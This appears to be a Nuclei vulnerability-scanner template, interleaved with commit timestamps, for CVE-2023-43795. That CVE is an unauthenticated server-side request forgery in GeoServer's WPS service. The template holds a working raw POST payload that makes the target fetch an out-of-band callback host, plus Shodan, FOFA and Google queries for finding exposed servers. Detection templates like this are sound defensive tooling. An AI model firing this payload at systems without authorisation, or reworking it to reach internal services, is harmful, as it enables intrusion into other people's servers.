2023-11-02 13:53:59 +00:00
id : CVE-2023-43795
info :
name : GeoServer WPS - Server Side Request Forgery
author : DhiyaneshDK
severity : critical
description : |
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
reference :
- https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
- https://nvd.nist.gov/vuln/detail/CVE-2023-43795
2024-03-23 09:28:19 +00:00
- https://github.com/20142995/sectool
2023-11-02 13:53:59 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-43795
cwe-id : CWE-918
2024-05-31 19:23:20 +00:00
epss-score : 0.13101
epss-percentile : 0.9552
2023-11-02 13:53:59 +00:00
cpe : cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 2
vendor : osgeo
product : geoserver
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"GeoServer"
- http.title:"geoserver"
fofa-query :
- app="GeoServer"
- app="geoserver"
- title="geoserver"
2024-05-31 19:23:20 +00:00
google-query : intitle:"geoserver"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,geoserver,ssrf,oast,oos,osgeo
2023-11-02 13:53:59 +00:00
variables :
oast : "{{interactsh-url}}"
string : "{{to_lower(rand_text_alpha(4))}}"
value : "{{to_lower(rand_text_alpha(5))}}"
http :
- raw :
- |
POST {{path}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://www.opengis.net/wps/1.0.0"
xmlns:wfs="http://www.opengis.net/wfs"
xmlns:wps="http://www.opengis.net/wps/1.0.0"
xmlns:ows="http://www.opengis.net/ows/1.1"
xmlns:gml="http://www.opengis.net/gml"
xmlns:ogc="http://www.opengis.net/ogc"
xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>JTS:area</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>geom</ows:Identifier>
<wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
<wps:Header key="{{string}}" value="{{value}}"/>
</wps:Reference>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput>
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
payloads :
path :
- /wms
- /geoserver/wms
stop-at-first-match : true
matchers :
- type : dsl
dsl :
- contains(interactsh_protocol, 'http')
- contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
- status_code == 200
condition : and
2024-06-01 06:53:00 +00:00
# digest: 4a0a0047304502202532b6c5eb4c8b86a6cbc92d99c1674017335e78d0932d798e89cbebd4e5e9e002210098facfd15b6f7d648364dcede3e8c1992b3c7a2d58b7b4200f5ce25ba1fc691a:922c64590222798bb761d5b6d8e72950